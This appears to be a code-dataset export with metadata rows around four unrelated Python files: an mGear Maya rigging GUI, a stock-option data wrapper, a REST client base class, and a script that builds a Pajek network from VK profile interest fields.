| 41.428571 | 74 | 0.698276 | 63 | 580 | 6.301587 | 0.396825 | 0.176322 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006237 | 0.17069 | 580 | 13 | 75 | 44.615385 | 0.819127 | 0 | 0 | 0 | 0 | 0 | 0.07931 | 0 | 0 | 0 | 0 | 0 | 0.727273 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05f7184b1636ce380b382f6f97cc79d0e2e8deeb | 15,251 | py | Python | scripts/mgear/maya/shifter/gui.py | KRNKRS/mgear | 06ddc26c5adb5eab07ca470c7fafa77404c8a1de | [
"MIT"
] | 94 | 2017-12-16T07:42:06.000Z | 2022-03-28T07:40:04.000Z | scripts/mgear/maya/shifter/gui.py | KRNKRS/mgear | 06ddc26c5adb5eab07ca470c7fafa77404c8a1de | [
"MIT"
] | 66 | 2017-12-02T14:30:35.000Z | 2019-01-14T01:17:38.000Z | scripts/mgear/maya/shifter/gui.py | KRNKRS/mgear | 06ddc26c5adb5eab07ca470c7fafa77404c8a1de | [
"MIT"
] | 27 | 2018-06-11T14:16:17.000Z | 2022-01-09T15:19:32.000Z | import os
from functools import partial
# pymel
import pymel.core as pm
# mgear
import mgear
from mgear.maya import shifter, skin, pyqt, utils
GUIDE_UI_WINDOW_NAME = "guide_UI_window"
GUIDE_DOCK_NAME = "Guide_Components"
##############################
# CLASS
##############################
class Guide_UI(object):
def __init__(self):
# Remove existing window
if pm.window(GUIDE_UI_WINDOW_NAME, exists=True):
print "deleting win"
pm.deleteUI(GUIDE_UI_WINDOW_NAME)
if pm.dockControl(GUIDE_DOCK_NAME, exists=True):
print "deleting dock"
pm.deleteUI(GUIDE_DOCK_NAME)
panelWeight = 200
scrollHight = 600
# Create Window and main tab
self.ui_window = pm.window(
GUIDE_UI_WINDOW_NAME, width=panelWeight, title="Guide Tools",
sizeable=True)
self.ui_topLevelColumn = pm.columnLayout(
adjustableColumn=True, columnAlign="center")
#
pm.columnLayout()
pm.rowLayout(numberOfColumns=1, columnWidth=[(1, panelWeight)])
pm.button(label="Settings", w=panelWeight, h=30,
bgc=[.042, .351, .615],
command=partial(self.inspectSettings))
pm.setParent('..')
pm.rowLayout(numberOfColumns=3, columnWidth=[
(1, (panelWeight / 3) - 1),
(2, (panelWeight / 3) - 1),
(3, (panelWeight / 3) - 1)])
pm.button(label="Dupl.", w=(panelWeight / 3) - 1, h=23,
bgc=[.311, .635, 0], command=partial(self.duplicate, False))
pm.button(label="Dupl. Sym", w=(panelWeight / 3) - 1, h=23,
bgc=[.465, .785, .159],
command=partial(self.duplicate, True))
pm.button(label="Extr. Ctl", w=(panelWeight / 3) - 1, h=23,
bgc=[.835, .792, .042],
command=partial(self.extractControls))
pm.setParent('..')
pm.rowLayout(numberOfColumns=1, columnWidth=[(1, panelWeight)])
pm.button(label="Build from selection", w=panelWeight, h=30,
bgc=[.912, .427, .176],
command=partial(self.buildFromSelection))
pm.setParent('..')
self.ui_tabs = pm.tabLayout(
width=panelWeight, innerMarginWidth=5, innerMarginHeight=5)
pm.tabLayout(self.ui_tabs, q=True, width=True)
#
self.ui_compColumn = pm.columnLayout(adj=True, rs=3)
self.ui_compFrameLayout = pm.frameLayout(
height=scrollHight, collapsable=False, borderVisible=False,
labelVisible=False)
self.ui_compList_Scroll = pm.scrollLayout(hst=0)
self.ui_compList_column = pm.columnLayout(
columnWidth=panelWeight, adj=True, rs=2)
pm.separator()
# List of components
# doGrouping = 1 < len(shifter.COMPONENTS_DIRECTORIES.keys())
compDir = shifter.getComponentDirectories()
trackLoadComponent = []
for path, comps in compDir.iteritems():
pm.text(align="center", label=os.path.basename(path))
pm.separator()
for comp_name in comps:
if comp_name in trackLoadComponent:
pm.displayWarning(
"Custom component name: %s, already in default "
"components. Names should be unique. This component is"
" not loaded" % comp_name)
continue
else:
trackLoadComponent.append(comp_name)
if not os.path.exists(os.path.join(path,
comp_name, "__init__.py")):
continue
module = shifter.importComponentGuide(comp_name)
reload(module)
image = os.path.join(path, comp_name, "icon.jpg")
buttonSize = 25
textDesc = "Name: " + module.NAME + "\nType:: " + \
module.TYPE + "\n===========\nAuthor: " + \
module.AUTHOR + "\nWeb: " + module.URL + \
"\nEmail: " + module.EMAIL + \
"\n===========\nDescription:\n" + module.DESCRIPTION
pm.rowLayout(numberOfColumns=2,
columnWidth=([1, buttonSize]),
adjustableColumn=2,
columnAttach=([1, "both", 0], [2, "both", 5]))
pm.symbolButton(ann=textDesc,
width=buttonSize,
height=buttonSize,
bgc=[0, 0, 0],
ebg=False, i=image,
command=partial(self.drawComp, module.TYPE))
pm.columnLayout(columnAlign="center")
pm.text(align="center", width=panelWeight * .6,
label=module.TYPE, ann=textDesc, fn="plainLabelFont")
pm.setParent(self.ui_compList_column)
pm.separator()
# Display the window
pm.tabLayout(self.ui_tabs, edit=True,
tabLabelIndex=([1, "Components"]))
allowedAreas = ['right', 'left']
pm.dockControl(GUIDE_DOCK_NAME, area='right', content=self.ui_window,
allowedArea=allowedAreas, width=panelWeight, s=True)
def drawComp(self, compType, *args):
guide = shifter.guide.Rig()
if pm.selected():
parent = pm.selected()[0]
else:
parent = None
guide.drawNewComponent(parent, compType)
# @utils.one_undo
@classmethod
def buildFromSelection(self, *args):
logWin = pm.window(title="Shifter Build Log", iconName='Shifter Log')
pm.columnLayout(adjustableColumn=True)
pm.cmdScrollFieldReporter(width=800, height=500, clr=True)
pm.button(label='Close', command=(
'import pymel.core as pm\npm.deleteUI(\"' + logWin +
'\", window=True)'))
pm.setParent('..')
pm.showWindow(logWin)
mgear.logInfos()
rg = shifter.Rig()
rg.buildFromSelection()
@classmethod
def duplicate(self, sym, *args):
oSel = pm.selected()
if oSel:
root = oSel[0]
guide = shifter.guide.Rig()
guide.duplicate(root, sym)
else:
mgear.log("Select one component root to edit properties",
mgear.sev_error)
return
@classmethod
def inspectSettings(self, *args):
oSel = pm.selected()
if oSel:
root = oSel[0]
else:
pm.displayWarning(
"please select one object from the componenet guide")
return
comp_type = False
guide_root = False
while root:
if pm.attributeQuery("comp_type", node=root, ex=True):
comp_type = root.attr("comp_type").get()
break
elif pm.attributeQuery("ismodel", node=root, ex=True):
guide_root = root
break
root = root.getParent()
pm.select(root)
if comp_type:
guide = shifter.importComponentGuide(comp_type)
pyqt.showDialog(guide.componentSettings)
elif guide_root:
module_name = "mgear.maya.shifter.guide"
guide = __import__(module_name, globals(), locals(), ["*"], -1)
pyqt.showDialog(guide.guideSettings)
else:
pm.displayError(
"The selected object is not part of component guide")
@classmethod
def inspectProperties(self, *args):
modeSet = ["FK", "IK", "IK/FK"]
rotOrderSet = ["XYZ", "YZX", "ZXY", "XZY", "YXZ", "ZYX"]
guideModeSet = ["Final", "WIP"]
# apply changes
def applyCloseGuide(root, *args):
if pm.attributeQuery("mode", node=root, ex=True):
root.attr("mode").set(guideModeSet.index(pMode.getValue()))
pm.select(root, r=True)
pm.deleteUI(window, window=True)
def skinLoad(root, *args):
startDir = root.attr("skin").get()
filePath = pm.fileDialog2(
dialogStyle=2,
fileMode=1,
startingDirectory=startDir,
fileFilter='mGear skin (*%s)' % skin.FILE_EXT)
if not filePath:
return
if not isinstance(filePath, basestring):
filePath = filePath[0]
root.attr("skin").set(filePath)
def applyCloseComp(root, *args):
newName = pName.getText()
newSide = pSide.getValue()
newIndex = pIndex.getValue1()
if pm.attributeQuery("mode", node=root, ex=True):
root.attr("mode").set(modeSet.index(pMode.getValue()))
if pm.attributeQuery("default_rotorder", node=root, ex=True):
root.attr("default_rotorder").set(
rotOrderSet.index(pRotOrder.getValue()))
guide = shifter.guide.Rig()
guide.updateProperties(root, newName, newSide, newIndex)
pm.select(root, r=True)
pm.deleteUI(window, window=True)
if pm.window("compProperties", exists=True):
pm.deleteUI("compProperties")
oSel = pm.selected()
if oSel:
root = oSel[0]
else:
mgear.log(
"Select one root Guide or component to edit properties",
mgear.sev_error)
return
if pm.attributeQuery("comp_type", node=root, ex=True):
# property window constructor
customAttr = pm.listAttr(root, ud=True)
window = pm.window(title=root.name())
pm.columnLayout(adjustableColumn=True, cal="right")
for attr in customAttr:
if attr == "comp_name":
fl = pm.formLayout()
oriVal = root.attr("comp_name").get()
pName = pm.textFieldGrp(label="comp_name")
pm.setParent('..')
pm.formLayout(fl, e=True, af=(pName, "left", 0))
pName.setText(oriVal)
elif attr == "comp_side":
sideSet = ["C", "L", "R"]
fl = pm.formLayout()
pSide = pm.optionMenu(label="comp_side")
pSide.addMenuItems(sideSet)
pSide.setWidth(120)
pm.setParent('..')
pm.formLayout(fl, e=1, af=(pSide, "left", 90))
oriVal = root.attr("comp_side").get()
pSide.setValue(oriVal)
elif attr == "mode":
fl = pm.formLayout()
pMode = pm.optionMenu(label="mode")
pMode.addMenuItems(modeSet)
pMode.setWidth(120)
pm.setParent('..')
pm.formLayout(fl, e=1, af=(pMode, "left", 115))
oriVal = root.attr("mode").get()
pMode.setValue(modeSet[oriVal])
elif attr == "default_rotorder":
fl = pm.formLayout()
pRotOrder = pm.optionMenu(label="default_rotorder")
pRotOrder.addMenuItems(rotOrderSet)
pRotOrder.setWidth(140)
pm.setParent('..')
pm.formLayout(fl, e=1, af=(pRotOrder, "left", 60))
oriVal = root.attr("default_rotorder").get()
pRotOrder.setValue(rotOrderSet[oriVal])
elif attr == "comp_index":
fl = pm.formLayout()
oriVal = root.attr("comp_index").get()
pIndex = pm.intFieldGrp(v1=oriVal, label="comp_index")
pm.setParent('..')
pm.formLayout(fl, e=True, af=(pIndex, "left", 0))
else:
editable = True
if attr == "comp_type":
editable = False
pm.columnLayout(cal="right")
pm.attrControlGrp(attribute=root.attr(
attr), po=True, en=editable)
pm.setParent('..')
pm.button(label='Apply', command=partial(
applyCloseComp, root), h=100)
pm.setParent('..')
pm.showWindow(window)
elif pm.attributeQuery("ismodel", node=root, ex=True):
# property window constructor
customAttr = pm.listAttr(root, ud=True)
window = pm.window(title=root.name())
pm.columnLayout(adjustableColumn=True, cal="right")
for attr in customAttr:
if attr.split("_")[-1] not in ["r", "g", "b"]:
if attr == "mode":
fl = pm.formLayout()
pMode = pm.optionMenu(label="mode")
pMode.addMenuItems(guideModeSet)
pMode.setWidth(120)
pm.setParent('..')
pm.formLayout(fl, e=1, af=(pMode, "left", 115))
oriVal = root.attr("mode").get()
pMode.setValue(guideModeSet[oriVal])
elif attr == "skin":
pm.columnLayout(cal="right")
pm.attrControlGrp(attribute=root.attr(attr), po=True)
pm.setParent('..')
pm.button(label='Load Skin ',
command=partial(skinLoad, root))
else:
pm.columnLayout(cal="right")
pm.attrControlGrp(attribute=root.attr(attr), po=True)
pm.setParent('..')
pm.button(label='Apply', command=partial(
applyCloseGuide, root), h=50)
pm.setParent('..')
pm.showWindow(window)
else:
mgear.log(
"Select a root Guide or component to edit properties",
mgear.sev_error)
return
def extractControls(self, *args):
oSel = pm.selected()
try:
cGrp = pm.PyNode("controllers_org")
except TypeError:
cGrp = False
mgear.log(
"Not controller group in the scene or the group is not unique",
mgear.sev_error)
for x in oSel:
try:
old = pm.PyNode(cGrp.name() + "|" +
x.name().split("|")[-1] + "_controlBuffer")
pm.delete(old)
except TypeError:
pass
new = pm.duplicate(x)[0]
pm.parent(new, cGrp, a=True)
pm.rename(new, x.name() + "_controlBuffer")
toDel = new.getChildren(type="transform")
pm.delete(toDel)
try:
pm.sets("rig_controllers_grp", remove=new)
except TypeError:
pass
| 37.288509 | 79 | 0.499967 | 1,451 | 15,251 | 5.188146 | 0.242591 | 0.023379 | 0.024176 | 0.013018 | 0.330765 | 0.267269 | 0.25186 | 0.230739 | 0.201116 | 0.178666 | 0 | 0.016059 | 0.379385 | 15,251 | 408 | 80 | 37.379902 | 0.779292 | 0.016458 | 0 | 0.346626 | 0 | 0 | 0.090117 | 0.005025 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.006135 | 0.027607 | null | null | 0.006135 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05fe83150bd16fbe021adff0767ad7e4b00d8b44 | 4,634 | py | Python | reader/fnoData/stkOptDailyDataWrapper.py | sifarone/gce_k8s_deployment | f596e17b9d0263ae24c61ebba9925af4719b4306 | [
"MIT"
] | null | null | null | reader/fnoData/stkOptDailyDataWrapper.py | sifarone/gce_k8s_deployment | f596e17b9d0263ae24c61ebba9925af4719b4306 | [
"MIT"
] | null | null | null | reader/fnoData/stkOptDailyDataWrapper.py | sifarone/gce_k8s_deployment | f596e17b9d0263ae24c61ebba9925af4719b4306 | [
"MIT"
] | 1 | 2021-01-24T17:07:37.000Z | 2021-01-24T17:07:37.000Z | from . import fnoUtils as utils
class StkOptDailyDataWrapper:
def __init__(self, dailyData):
self.date = utils.convertDateToString(dailyData['date'])
self.stkOptOpenPrice = dailyData['stkOptOpenPrice']
self.stkOptHighPrice = dailyData['stkOptHighPrice']
self.stkOptLowPrice = dailyData['stkOptLowPrice']
self.stkOptClosePrice = dailyData['stkOptClosePrice']
self.stkOptSettlePrice = dailyData['stkOptSettlePrice']
self.stkOptContracts = dailyData['stkOptContracts']
self.stkOptValueInLakhs = dailyData['stkOptValueInLakhs']
self.stkOptOpenInterest = dailyData['stkOptOpenInterest']
self.stkOptChangeInOpenInterest = dailyData['stkOptChangeInOpenInterest']
def getDailyDatainListForm(self):
returnList = []
returnList.append(self.date)
returnList.append(self.stkOptOpenPrice)
returnList.append(self.stkOptHighPrice)
returnList.append(self.stkOptLowPrice)
returnList.append(self.stkOptClosePrice)
returnList.append(self.stkOptSettlePrice)
returnList.append(self.stkOptContracts)
returnList.append(self.stkOptValueInLakhs)
returnList.append(self.stkOptOpenInterest)
returnList.append(self.stkOptChangeInOpenInterest)
return returnList
def getDailyDataInfo(self):
returnData = {}
returnData.update({'date': self.date})
returnData.update({'stkOptOpenPrice': self.stkOptOpenPrice})
returnData.update({'stkOptHighPrice': self.stkOptHighPrice})
returnData.update({'stkOptLowPrice': self.stkOptLowPrice})
returnData.update({'stkOptClosePrice': self.stkOptClosePrice})
returnData.update({'stkOptSettlePrice': self.stkOptSettlePrice})
returnData.update({'stkOptContracts': self.stkOptContracts})
returnData.update({'stkOptValueInLakhs': self.stkOptValueInLakhs})
returnData.update({'stkOptOpenInterest': self.stkOptOpenInterest})
returnData.update({'stkOptChangeInOpenInterest': self.stkOptChangeInOpenInterest})
return returnData
def getStkOptDate(self):
return self.date
def getStkOptOpenPrice(self):
return self.stkOptOpenPrice
def getStkOptHighPrice(self):
return self.stkOptHighPrice
def getStkOptLowPrice(self):
return self.stkOptLowPrice
def getStkOptClosePrice(self):
return self.stkOptClosePrice
def getStkOptSettlePrice(self):
return self.stkOptSettlePrice
def getStkOptContracts(self):
return self.stkOptContracts
def getStkOptValueInLakhs(self):
return self.stkOptValueInLakhs
def getStkOptOpenInterest(self):
return self.stkOptOpenInterest
def getStkOptChangeInOpenInterest(self):
return self.stkOptChangeInOpenInterest
def printTypesOfDailyDataFields(self):
print('type(date) : ', type(self.date))
print('type(stkOptOpenPrice) : ', type(self.stkOptOpenPrice))
print('type(stkOptHighPrice) : ', type(self.stkOptHighPrice))
print('type(stkOptLowPrice) : ', type(self.stkOptLowPrice))
print('type(stkOptClosePrice) : ', type(self.stkOptClosePrice))
print('type(stkOptSettlePrice) : ', type(self.stkOptSettlePrice))
print('type(stkOptContracts) : ', type(self.stkOptContracts))
print('type(stkOptValueInLakhs) : ', type(self.stkOptValueInLakhs))
print('type(stkOptOpenInterest) : ', type(self.stkOptOpenInterest))
print('type(stkOptChangeInOpenInterest) : ', type(self.stkOptChangeInOpenInterest))
def printDailyData(self) :
print('date : ', self.date)
print('stkOptOpenPrice : ', self.stkOptOpenPrice)
print('stkOptHighPrice : ', self.stkOptHighPrice)
print('stkOptLowPrice : ', self.stkOptLowPrice)
print('stkOptClosePrice : ', self.stkOptClosePrice)
print('stkOptSettlePrice : ', self.stkOptSettlePrice)
print('stkOptContracts : ', self.stkOptContracts)
print('stkOptValueInLakhs : ', self.stkOptValueInLakhs)
print('stkOptOpenInterest : ', self.stkOptOpenInterest)
print('stkOptChangeInOpenInterest : ', self.stkOptChangeInOpenInterest) | 48.270833 | 95 | 0.645878 | 321 | 4,634 | 9.311526 | 0.133956 | 0.05353 | 0.066912 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.259819 | 4,634 | 96 | 96 | 48.270833 | 0.871429 | 0 | 0 | 0 | 0 | 0 | 0.219202 | 0.057389 | 0 | 0 | 0 | 0 | 0 | 1 | 0.185185 | false | 0 | 0.012346 | 0.123457 | 0.358025 | 0.271605 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
af080e2b64d93029d96213945225bd76584d1bfa | 4,692 | py | Python | nuaal/connections/api/RestBase2.py | mihudec/nuaal | c5c50c59e8a1f2b3f0f6a5266f4dd392befc13cd | [
"Apache-2.0"
] | null | null | null | nuaal/connections/api/RestBase2.py | mihudec/nuaal | c5c50c59e8a1f2b3f0f6a5266f4dd392befc13cd | [
"Apache-2.0"
] | null | null | null | nuaal/connections/api/RestBase2.py | mihudec/nuaal | c5c50c59e8a1f2b3f0f6a5266f4dd392befc13cd | [
"Apache-2.0"
] | null | null | null | import timeit
import logging
import requests
from requests.auth import HTTPBasicAuth
from requests.exceptions import ConnectionError, Timeout
import json
import os
from nuaal.definitions import DATA_PATH
from nuaal.utils import get_logger
class RestBase2(object):
    """
    Parent class for all REST-like connections.

    Child classes are expected to override ``_authorize``, ``_store_credentials``
    and ``_load_credentials`` with connection-specific behaviour.
    """
    def __init__(self, url, username=None, password=None, api_base_path=None, verify_ssl=False, DEBUG=False, con_type=None):
        """
        :param url: URL or IP address of the target machine
        :param username: Username for authentication
        :param password: Password for authentication
        :param api_base_path: Base path for the API resource, such as "/api/v1"
        :param verify_ssl: Enable SSL certificate verification. For self-signed certificates, set this to False
        :param DEBUG: Enable debugging output
        :param con_type: String representation of connection type, set by child classes
        """
        # Disable noisy logging from the HTTP libraries.
        logging.getLogger("requests").setLevel(logging.WARNING)
        logging.getLogger("urllib3").setLevel(logging.WARNING)
        self.url = url
        self.logger = get_logger(name="{}-{}".format(con_type if con_type else 'REST', self.url), DEBUG=DEBUG)
        self.username = username
        self.password = password
        self.api_base_path = api_base_path
        self.verify_ssl = verify_ssl
        self.DEBUG = DEBUG
        # Full prefix for relative request paths; assumes api_base_path starts with "/".
        self.path_base = self.url + self.api_base_path
        self.headers = {"Content-type": "application/json"}
        # Keyword arguments shared by every requests call made by self.request().
        self.common_headers = {"headers": self.headers, "verify": self.verify_ssl}
        self.authorized = False

    def _initialize(self):
        """
        Function for credentials loading and session preparation. Might be overwritten in child classes

        :return: ``None``
        """
        if not self.verify_ssl:
            # Disable certificate warning
            try:
                requests.packages.urllib3.disable_warnings()
            except Exception:
                # Narrowed from a bare ``except:`` so SystemExit/KeyboardInterrupt
                # are never swallowed here.
                self.logger.warning(msg="Failed to disable Certificate Warnings")
        if self.username is None or self.password is None:
            self.logger.info(msg="No credentials provided, using cached instead.")
            if self._load_credentials():
                self.logger.info(msg="Credentials successfully loaded.")
            else:
                self.logger.info(msg="Failed to load valid credentials.")
        else:
            self._authorize()

    def _authorize(self):
        """
        Connection-specific function for handling authorization. Overridden by child classes

        :return: ``None``
        """
        pass

    def _store_data(self, data, path):
        """Serialize ``data`` as JSON into ``DATA_PATH/path``; failures are logged, not raised."""
        path = os.path.join(DATA_PATH, path)
        try:
            with open(file=path, mode="w") as f:
                json.dump(obj=data, fp=f, indent=2)
        except Exception as e:
            self.logger.error(msg="Could not store data to file '{}'. Exception: {}".format(path, repr(e)))

    def _load_data(self, path):
        """Load JSON from ``DATA_PATH/path``; returns ``None`` on any failure."""
        data = None
        path = os.path.join(DATA_PATH, path)
        try:
            with open(file=path, mode="r") as f:
                data = json.load(fp=f)
        except Exception as e:
            self.logger.error(msg="Could not load data from file '{}'. Exception: {}".format(path, repr(e)))
        finally:
            return data

    def _store_credentials(self):
        """
        Connection-specific function for handling authorization. Overridden by child classes

        :return: ``None``
        """
        pass

    def _load_credentials(self):
        """
        Connection-specific function for handling authorization. Overridden by child classes

        :return: ``None``
        """
        pass

    def request(self, method="GET", path="", raw=False, **kwargs):
        """Perform an HTTP request against the API.

        :param method: HTTP verb, e.g. "GET"
        :param path: Path relative to ``self.path_base`` when it starts with "/",
            otherwise treated as a full URL
        :param raw: When True return ``(response, status_code)`` instead of parsed JSON
        :param kwargs: Extra keyword arguments forwarded to ``requests.request``
        :return: ``(data_or_response_or_None, status_code_or_None)``
        """
        if not self.authorized:
            try:
                self._authorize()
            except Exception as e:
                self.logger.critical("Failed to authorize.")
            finally:
                if not self.authorized:
                    return None, None
        response = None
        # BUGFIX: the original indexed path[0], which raises IndexError for the
        # default path="" -- startswith() handles the empty string safely.
        url = self.path_base + path if path.startswith("/") else path
        try:
            response = requests.request(method=method, url=url, **kwargs, **self.common_headers)
        except requests.exceptions.ConnectionError:
            self.logger.critical(msg="Could not connect to {}".format(self.url))
        # BUGFIX: after a ConnectionError the original went on to dereference
        # response.status_code on None; bail out with the (None, None) convention.
        if response is None:
            return None, None
        if raw:
            return response, response.status_code
        status_code = response.status_code
        if status_code == 200:
            return response.json(), status_code
        # Keep the (data, status) tuple shape for non-200 replies instead of an
        # implicit bare None, matching the (None, None) returns above.
        return None, status_code
| 36.092308 | 124 | 0.612532 | 545 | 4,692 | 5.176147 | 0.284404 | 0.031904 | 0.019497 | 0.031195 | 0.204537 | 0.204537 | 0.174761 | 0.174761 | 0.174761 | 0.174761 | 0 | 0.002707 | 0.291347 | 4,692 | 129 | 125 | 36.372093 | 0.845714 | 0.207374 | 0 | 0.268293 | 0 | 0 | 0.102681 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0.073171 | 0.109756 | 0 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
af0a713f63ad7b9f547d2566aba51e999d586ae3 | 4,005 | py | Python | code/fields2network.py | alexeyknorre/PyVK | 5b93032f8296d58b53776107c48e9954eb4ce2c0 | [
"MIT"
] | null | null | null | code/fields2network.py | alexeyknorre/PyVK | 5b93032f8296d58b53776107c48e9954eb4ce2c0 | [
"MIT"
] | null | null | null | code/fields2network.py | alexeyknorre/PyVK | 5b93032f8296d58b53776107c48e9954eb4ce2c0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 04 13:44:10 2016
@author: Alexey
"""
import pandas as pd
import operator
from transliterate import translit, get_available_language_codes
import re
# Input CSV of scraped VK profiles. NOTE(review): the name `csv` shadows the
# stdlib csv module name -- harmless here (this module does not import csv),
# but worth confirming before adding such an import.
csv = '../results/profiles.csv'
## test
# csv = '../tests/profiles.csv'
# PAJEK_EDGELIST = '../tests/test_edgelist.net'
# field = "music"
# minimum_occurences = 25
# Regex of filler answers (Russian: "various", "depends on my mood", etc.)
# stripped from profile text. NOTE(review): the trailing '|' makes the pattern
# also match the empty string at every position -- confirm that is intentional.
USELESS_WORDS = u'разная|разное|разные|по настроению|под настроение|меломанка|меломан|всякая|все|всякая|нету|зависит от настроения|слушаю всё|всё|нет|_|'
def read_data(fields, csv=csv):
    """Load ``uid`` plus the requested profile columns and join them into one
    lowercase 'field' text column; rows with no text are dropped.

    :param fields: comma-separated column names, e.g. "music,movies"
    :param csv: path to the profiles CSV (defaults to the module-level path)
    """
    columns = ["uid"] + fields.split(',')
    df = pd.read_csv(csv, na_values=["[]"],
                     usecols=columns, encoding="utf-8")
    field_names = fields.split(',')
    # Concatenate the selected columns with ", " directly instead of the
    # original exec() on a generated code string (same result, no code eval).
    combined = df[field_names[0]]
    for name in field_names[1:]:
        combined = combined + ", " + df[name]
    df['field'] = combined.str.lower()
    # Any NaN column propagates NaN through the concatenation, so such rows drop here.
    df = df.dropna(subset=['field'])
    return df
def clean_data(df):
    """Strip noise from the free-text Series: odd punctuation, filler answers,
    and long single-character runs such as "00000000"."""
    # Punctuation that carries no signal for the co-occurrence graph.
    cleaned = df.str.replace('[!_@#¶()]', '', case=False)
    # Generic filler answers ("various", "depends on my mood", ...).
    cleaned = cleaned.str.replace(USELESS_WORDS, '')
    # Collapse spam: five or more repeats of the same character.
    return cleaned.str.replace(r'(.)\1{4,}', '')
def get_sorted_dict(df):
    """Count comma-separated entries across all rows.

    Returns ``(freq, ranked)`` where ``freq`` maps entry -> count and ``ranked``
    is the (entry, count) pairs sorted by count, most frequent first.
    """
    freq = {}
    for row in df:
        for raw in row.split(","):
            key = raw.strip()
            freq[key] = freq.get(key, 0) + 1
    ranked = sorted(freq.items(), key=lambda item: item[1], reverse=True)
    return freq, ranked
def show_sorted_dict(sorted_dict, elements=50):
    """Print the top `elements` (entry, count) pairs from a ranked frequency list.

    Python 2 print statement. NOTE(review): raises IndexError when the list has
    fewer than `elements` entries -- confirm callers guarantee enough items.
    """
    for i in range(elements):
        print sorted_dict[i][0], sorted_dict[i][1]
def get_arcs(df, vertices):
    """Build weighted co-occurrence arcs between vertices (Python 2).

    Returns a dict mapping (from_index + 1, to_index + 1) -> count, using
    1-based indices because Pajek numbers vertices from 1.
    """
    print "Getting arcs..."
    arcs = {}
    c = 0
    for field in df:
        c += 1
        if c % 1000 == 0:
            # Progress indicator every 1000 rows.
            print c
        elements = []
        elements_raw = field.split(",")
        for element in elements_raw:
            elements.append(element.strip())
        for element in elements:
            if element not in vertices:
                continue
            # NOTE(review): `other_elements` ALIASES `elements`; remove() below
            # mutates the very list being iterated by the enclosing for-loop,
            # which skips every element following a removed one. Looks like a
            # bug (a copy was probably intended) -- confirm before changing.
            other_elements = elements
            other_elements.remove(element)
            # vertices.index() is O(n); fine for small vertex lists.
            vertice_from = vertices.index(element)
            # NOTE(review): this check is always True (a list is never None).
            if other_elements is not None:
                for other_element in other_elements:
                    if other_element not in vertices:
                        continue
                    vertice_to = vertices.index(other_element)
                    # Add 1 so arcs index starts with 1
                    arc = (vertice_from + 1, vertice_to + 1)
                    if arc in arcs:
                        arcs[arc] += 1
                    else:
                        arcs[arc] = 1
    return arcs
def get_vertices(sorted_dict, minimum_occurences):
    """Keep entries seen at least `minimum_occurences` times and longer than
    two characters; input is the ranked (entry, count) list (Python 2)."""
    print "Getting vertices..."
    vertices = []
    for i in sorted_dict:
        # i is an (entry, count) pair from get_sorted_dict's ranked output.
        if i[1] >= minimum_occurences and len(i[0]) > 2:
            vertices.append(i[0])
    return vertices
def save_edgelist(vertices, arcs, fields):
    """Write vertices and weighted arcs to a Pajek .net file under ../results/
    (Python 2; vertex labels are transliterated from Russian for Pajek)."""
    print "Saving..."
    PAJEK_EDGELIST = '../results/'+fields+'.net'
    # 'wb' + explicit "\r\n" produces the CRLF line endings Pajek expects.
    with open(PAJEK_EDGELIST, 'wb') as f:
        f.write("*Vertices " + str(len(vertices)) + "\r\n")
        c = 0
        for i in vertices:
            c += 1
            # Transliterate for Pajek
            i = translit(i, "ru", reversed=True)
            # Leave only literals and _ for Pajek
            i = re.sub("[\W_]+", "_", i)
            f.write(str(c) + ' "' + str(i.encode("utf-8")) + '"\r\n')
        f.write("*Arcs \r\n")
        for i in arcs.items():
            # i is ((from, to), weight) -- written as "from to weight".
            f.write(str(i[0][0]) + " " + str(i[0][1]) + " " + str(i[1]) + "\r\n")
def csv2pajek(fields, minimum_occurences):
    """End-to-end pipeline: profiles CSV -> cleaned text -> co-occurrence graph
    -> Pajek edgelist in ../results/<fields>.net.

    :param fields: comma-separated profile columns, e.g. "music"
    :param minimum_occurences: frequency threshold for keeping a vertex
    """
    df = read_data(fields)
    df_clean = clean_data(df['field'])
    # Call get_sorted_dict once -- the original called it twice, scanning every
    # row a second time just to unpack the tuple.
    music_freq, srt = get_sorted_dict(df_clean)
    v = get_vertices(srt, minimum_occurences)
    arcs = get_arcs(df_clean, v)
    save_edgelist(v, arcs, fields)
